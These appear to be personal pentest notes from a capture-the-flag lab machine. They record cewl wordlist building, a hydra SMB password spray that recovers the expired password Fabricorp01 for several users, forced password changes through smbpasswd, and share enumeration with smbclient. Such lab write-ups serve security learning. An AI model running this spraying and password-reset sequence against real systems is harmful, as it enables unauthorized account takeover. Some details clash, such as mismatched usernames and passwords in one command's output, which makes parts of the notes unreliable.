5 spray passwd

# smb doesn't connect
# ldap needs auth

# time to cewl: build a wordlist from the words on the exposed PaperCut print-log pages
$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt

# ssh - nothing; trying smb
$ hydra -L users -P pass.txt smb://10.10.10.193
[DATA] attacking smb://10.10.10.193:445/
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: tlavel   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bnielson   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bhult   password: Fabricorp01


# trying smbclient
$ smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bnielson
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

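# NT_STATUS_PASSWORD_MUST_CHANGE: the password is valid but expired, so the session is refused until it is changed
# we need to change the password using smbpasswd in kali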
$ smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password: kashz
Retype new SMB password: kashz
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.

# the rejection means there's a password policy that the new password has to follow
# changing to Fabricorp02

$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: Fabricorp05
Retype new SMB password: Fabricorp05
Password changed for user tlavel

$ smbclient -U tlavel -L //10.10.10.193
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE

# trying other users
# fails for bhult also
| bnielson works

$ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
		
# every 1-2 min the password is reset; it then has to be changed again, to a different value each time, because reusing the same one gives the error:
| machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri May 29 16:29:09 2020
  ..                                  D        0  Fri May 29 16:29:09 2020
  fabricorp.local                    Dr        0  Fri May 29 16:29:09 2020
  
smb: \fabricorp.local\> dir
  .                                   D        0  Fri May 29 16:35:39 2020
  ..                                  D        0  Fri May 29 16:35:39 2020
  DfsrPrivate                      DHSr        0  Fri May 29 16:35:39 2020
  Policies                            D        0  Fri May 29 16:29:19 2020
  scripts                             D        0  Fri May 29 16:29:09 2020

# cannot view DfsrPrivate
# scripts is empty
# Policies contains policy-related information

# nothing in smb
